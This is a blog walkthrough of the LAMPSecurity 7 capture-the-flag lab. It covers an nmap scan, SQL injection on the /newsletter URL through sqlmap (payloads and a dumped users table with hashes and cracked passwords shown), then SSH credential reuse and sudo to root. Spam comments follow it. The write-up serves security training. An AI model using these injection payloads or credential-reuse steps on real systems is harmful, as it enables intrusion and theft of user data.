CTF series LAMP SECURITY 7 : I have been spending a lot of time trying to improve my hacking skills in order to prepare for my OFFSEC certification challenge. I have been struggling to improve my average time to compromise a box ( remember i need to do 5 in 24 hours to clear the offsec challenge) so any easy boxes i find along the way are welcome :P . They kinda increase my confidence. Lampsecurity7 seems like one such box. I am glad i pawned it and that too in optimal time (imho since the time can greatly vary depending upon the skill of the person). Thanks to the author for helping me prepare for the exam :-)
Detailed Steps to get root :
An nmap scan of the box reveals a number of open services.
We see a webapplication running on the box. While playing around with the webapplication we notice the /newsletter URL which by adding a ' to the URL we a detailed error message printed out which leads us to believe that the box suffers from sql injection.
We capture the traffic using burp and run sqlmap to see if we can find any interesting databases.
Sqlmap is able to dump a few databases for us namely i) information_schema
ii) mysql iii) roundcube & iv) website
We try to dump the contents of these databases using the sqlmap -D parameter
Sqlmap is able to dump various tables in the website database. We keep dumping the contents of these various tables till we see that the `users` table dumps a list of possible database users and their credentials (sqlmap helps us crack these as well . its so amazing and powerful !) . Luckily we see that the passwords are not salted.
We know that the box is running a ssh service so we try to login to the box hoping that at least some user would have reused his ssh credentials.
We ssh into the box and seems like julia is in the sudo users list and we can immediately escalate our priv to root :-) Simple and easy
Detailed Steps to get root :
An nmap scan of the box reveals a number of open services.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Not shown: 64991 filtered ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) | |
| | ssh-hostkey: | |
| | 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA) | |
| |_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA) | |
| 80/tcp open http Apache httpd 2.2.15 ((CentOS)) | |
| | http-methods: | |
| |_ Supported Methods: GET HEAD POST OPTIONS | |
| |_http-server-header: Apache/2.2.15 (CentOS) | |
| |_http-title: Mad Irish Hacking Academy | |
| 137/tcp closed netbios-ns | |
| 138/tcp closed netbios-dgm | |
| 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP) | |
| 901/tcp open http Samba SWAT administration server | |
| | http-auth: | |
| | HTTP/1.0 401 Authorization Required | |
| |_ Basic realm=SWAT | |
| | http-methods: | |
| |_ Supported Methods: GET POST | |
| |_http-title: 401 Authorization Required | |
| 5900/tcp closed vnc | |
| 8080/tcp open http Apache httpd 2.2.15 ((CentOS)) | |
| | http-methods: | |
| |_ Supported Methods: GET HEAD POST OPTIONS | |
| | http-open-proxy: Potentially OPEN proxy. | |
| |_Methods supported:CONNECTION | |
| |_http-server-header: Apache/2.2.15 (CentOS) | |
| | http-title: Admin :: Mad Irish Hacking Academy | |
| |_Requested resource was /login.php | |
| 10000/tcp open http MiniServ 1.610 (Webmin httpd) | |
| |_http-favicon: Unknown favicon MD5: 9A2006C267DE04E262669D821B57EAD1 | |
| | http-methods: | |
| |_ Supported Methods: GET HEAD POST OPTIONS | |
| | http-robots.txt: 1 disallowed entry | |
| |_/ | |
| |_http-server-header: MiniServ/1.610 | |
| |_http-title: Login to Webmin | |
| MAC Address: 00:0C:29:9D:12:A9 (VMware) | |
| Device type: general purpose | |
| Running: Linux 2.6.X|3.X | |
| OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | |
| OS details: Linux 2.6.32 - 3.13 | |
| Uptime guess: 49.711 days (since Thu Dec 24 10:56:35 2015) | |
| Network Distance: 1 hop | |
| TCP Sequence Prediction: Difficulty=263 (Good luck!) | |
| IP ID Sequence Generation: All zeros | |
| Host script results: | |
| | smb-os-discovery: | |
| | OS: Unix (Samba 3.5.10-125.el6) | |
| | Computer name: localhost | |
| | NetBIOS computer name: | |
| | Domain name: | |
| | FQDN: localhost | |
| |_ System time: 2016-01-28T10:39:45-05:00 | |
| | smb-security-mode: | |
| | account_used: guest | |
| | authentication_level: user | |
| | challenge_response: supported | |
| |_ message_signing: disabled (dangerous, but default) | |
| |_smbv2-enabled: Server doesn't support SMBv2 protocol | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.74 ms 192.168.116.139 |
We see a webapplication running on the box. While playing around with the webapplication we notice the /newsletter URL which by adding a ' to the URL we a detailed error message printed out which leads us to believe that the box suffers from sql injection.
We capture the traffic using burp and run sqlmap to see if we can find any interesting databases.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat sql.file | |
| GET /newsletter&id=1 HTTP/1.1 | |
| Host: 192.168.116.139 | |
| User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Cookie: PHPSESSID=pv1evkh5h3rjfajojfdbiqnd72; testing=1; roundcube_sessid=0oo5o02r2217dbff3t53j40j06 | |
| Connection: close |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap -r sql.file --dbs | |
| _ | |
| ___ ___| |_____ ___ ___ {1.0-dev-nongit-201602070a89} | |
| |_ -| . | | | .'| . | | |
| |___|_ |_|_|_|_|__,| _| | |
| |_| |_| http://sqlmap.org | |
| [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program | |
| [*] starting at 11:47:12 | |
| ........ | |
| sqlmap resumed the following injection point(s) from stored session: | |
| --- | |
| Parameter: #1* (URI) | |
| Type: boolean-based blind | |
| Title: AND boolean-based blind - WHERE or HAVING clause | |
| Payload: http://192.168.116.139:80/newsletter&id=1 AND 6207=6207 | |
| Type: error-based | |
| Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause | |
| Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT 2804 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(2804=2804,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) | |
| Type: AND/OR time-based blind | |
| Title: MySQL >= 5.0.12 AND time-based blind (SELECT) | |
| Payload: http://192.168.116.139:80/newsletter&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xbRE) | |
| Type: UNION query | |
| Title: Generic UNION query (NULL) - 5 columns | |
| Payload: http://192.168.116.139:80/newsletter&id=-9786 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176707671,0x6645506a52417641745455654c44514f5554746b42486e4f496a434c6b6a5372506f766a696a4f4f,0x716a767a71),NULL-- - | |
| --- | |
| [11:47:14] [INFO] the back-end DBMS is MySQL | |
| web server operating system: Linux CentOS 6.5 | |
| web application technology: PHP 5.3.3, Apache 2.2.15 | |
| back-end DBMS: MySQL 5 | |
| [11:47:14] [INFO] fetching database names | |
| [11:47:14] [INFO] the SQL query used returns 4 entries | |
| [11:47:14] [INFO] resumed: information_schema | |
| [11:47:14] [INFO] resumed: mysql | |
| [11:47:14] [INFO] resumed: roundcube | |
| [11:47:14] [INFO] resumed: website | |
| available databases [4]: | |
| [*] information_schema | |
| [*] mysql | |
| [*] roundcube | |
| [*] website | |
Sqlmap is able to dump a few databases for us namely i) information_schema
ii) mysql iii) roundcube & iv) website
We try to dump the contents of these databases using the sqlmap -D
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap -r sql.file --dbs -D website --dump | |
| .... | |
| .... | |
| [11:47:43] [INFO] fetching tables for database: 'website' | |
| [11:47:43] [INFO] the SQL query used returns 9 entries | |
| [11:47:43] [INFO] resumed: contact | |
| [11:47:43] [INFO] resumed: documents | |
| [11:47:43] [INFO] resumed: hits | |
| [11:47:43] [INFO] resumed: log | |
| [11:47:43] [INFO] resumed: newsletter | |
| [11:47:43] [INFO] resumed: payment | |
| [11:47:43] [INFO] resumed: trainings | |
| [11:47:43] [INFO] resumed: trainings_x_users | |
| [11:47:43] [INFO] resumed: users | |
| [11:47:43] [INFO] fetching columns for table 'hits' in database 'website' | |
| .... | |
| .... | |
| Database: website | |
| Table: users | |
| [13 entries] | |
| +---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+ | |
| | user_id | profile | username | realname | password | last_login | | |
| +---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+ | |
| | 4 | <blank> | john@localhost.localdomain | John Durham | 0d9ff2a4396d6939f80ffe09b1280ee1 | NULL | | |
| | 5 | <blank> | alice@localhost.localdomain | Alice Wonder | 2146bf95e8929874fc63d54f50f1d2e3 | NULL | | |
| | 6 | <blank> | ruby@localhost.localdomain | Ruby Spinster | 9f80ec37f8313728ef3e2f218c79aa23 | NULL | | |
| | 7 | <blank> | leon@localhost.localdomain | Leon Parnetta | 5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) | NULL | | |
| | 8 | <blank> | julia@localhost.localdomain | Julia Fields | ed2539fe892d2c52c42a440354e8e3d5 (madrid) | NULL | | |
| | 9 | <blank> | michael@localhost.localdomain | Michael Saint | 9c42a1346e333a770904b2a2b37fa7d3 (somepassword) | NULL | | |
| | 10 | <blank> | bruce@localhost.localdomain | Bruce Pottricks | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | NULL | | |
| | 11 | <blank> | neil@localhost.localdomain | Neil Felstein | 4773408d5358875b3764db552a29ca61 | NULL | | |
| | 12 | <blank> | charles@localhost.localdomain | Charles Adams | b2a97bcecbd9336b98d59d9324dae5cf | NULL | | |
| | 36 | <blank> | foo@bar.com | <blank> | 4cb9c8a8048fd02294477fcb1a41191a (changeme) | NULL | | |
| | 114 | <blank> | <blank> | <blank> | d41d8cd98f00b204e9800998ecf8427e () | NULL | | |
| | 113 | <blank> | test@nowhere.com | <blank> | 098f6bcd4621d373cade4e832627b4f6 (test) | NULL | | |
| | 3 | Brian is our technical brains behind the operations and a chief trainer. | brian@localhost.localdomain | Brian Hershel | e22f07b17f98e0d9d364584ced0e3c18 | 2012-12-19 11:30:54 | | |
| +---------+--------------------------------------------------------------------------+-------------------------------+-----------------+-------------------------------------------------+---------------------+ | |
Sqlmap is able to dump various tables in the website database. We keep dumping the contents of these various tables till we see that the `users` table dumps a list of possible database users and their credentials (sqlmap helps us crack these as well . its so amazing and powerful !) . Luckily we see that the passwords are not salted.
We know that the box is running a ssh service so we try to login to the box hoping that at least some user would have reused his ssh credentials.
We ssh into the box and seems like julia is in the sudo users list and we can immediately escalate our priv to root :-) Simple and easy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh julia@192.168.116.139 | |
| julia@192.168.116.139's password: | |
| Last login: Thu Jan 28 17:58:01 2016 from 192.168.116.137 | |
| [julia@localhost ~]$ id | |
| uid=506(julia) gid=506(julia) groups=506(julia),10(wheel),511(sales) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 | |
| [julia@localhost ~]$ sudo /bin/bash | |
| [sudo] password for julia: | |
| [root@localhost julia]# |
Such an interesting blog on PHP! Hope readers who visit your blog will definitely impress in the way of your writing. Thank you admin, do post your thoughts frequently.
ReplyDeleteRegards:
PHP Training Chennai | PHP Training Institute in Chennai
interesting blog,
ReplyDeleteRegards,
PHP Training in Chennai | PHP Course in Chennai
Have been a long wait for this blog. Happy on reading. Do share more of this kind.
ReplyDeleteIELTS Coaching in Mulund
IELTS Training in Mulund West
IELTS Courses in Mulund
IELTS Coaching Centres in Mulund
IELTS Centres in Mulund East
calculatordemon
ReplyDeletePlaytech Announces Multi-Year Deal with Evolution Gaming
ReplyDeleteEvolution 서울특별 출장마사지 Gaming and Evolution 사천 출장안마 Gaming (EVO.V) will enter the Global Gaming Technology In this 김제 출장안마 week's Evolution 진주 출장안마 Gaming Genre: Gaming, Entertainment, 성남 출장샵 Technology
perde modelleri
ReplyDeletesms onay
Türk Telekom Mobil Ödeme Bozdurma
nft nasıl alınır
ankara evden eve nakliyat
trafik sigortasi
DEDEKTOR
HTTPS://KURMA.WEBSİTE/
Aşk kitapları
Smm Panel
ReplyDeleteSmm Panel
iş ilanları
instagram takipçi satın al
hirdavatciburada.com
Beyazesyateknikservisi.com.tr
Servis
tiktok jeton hilesi